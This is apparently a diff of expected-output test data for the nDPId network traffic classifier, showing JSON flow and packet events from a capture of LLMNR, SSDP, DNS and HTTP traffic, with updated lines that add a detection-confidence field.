 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1470104430476,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1470104430476,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8EAAAERxxzAqAUy4AAA\/N83FOsAJVssAmsAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1470104430884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"ts_msec":1470104430884,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQADwmYU6wAlV+upSAAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1470104430884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1470104430884,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8UAAAERxxjAqAUy4AAA\/MJmFOsAJdEfqUgAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1470104431294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"ts_msec":1470104431294,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQADwmYU6wAlV+upSAAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1470104432318,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104432318,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OyoAAAER17zAqAUs4AAA\/Oa2FOsAIkMsz20AAAABAAAAAAAACGphc29uLVBDAAD\/AAE="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1470104432630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1470104432630,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD5GQU6wAjSCvt1AAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1470104432630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104432630,"pkt":"AQBeAAD8PKn0WgOECABFAAA3IDQAAAER8\/HAqAPs4AAA\/P\/YFOsAI0Pg7dQAAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104432630,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1470104432728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1470104432728,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD5GQU6wAjSCvt1AAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1470104432728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1470104432728,"pkt":"AQBeAAD8PKn0WgOECABFAAA3IDUAAAER8\/DAqAPs4AAA\/P\/YFOsAI0Pg7dQAAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1470104433649,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1470104433649,"pkt":"\/\/\/\/\/\/\/\/AAK2Qbs6CABFAABEAABAAEARd0fAqAK6\/\/\/\/\/4AAB5sAMBr8aWNSVlNvVTlBQUJYWldKRFlXeHNBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104381217,"flow_last_seen":1470104426277,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399652,"flow_last_seen":1470104400059,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104381217,"flow_last_seen":1470104426277,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399652,"flow_last_seen":1470104400059,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104378045,"flow_last_seen":1470104423102,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
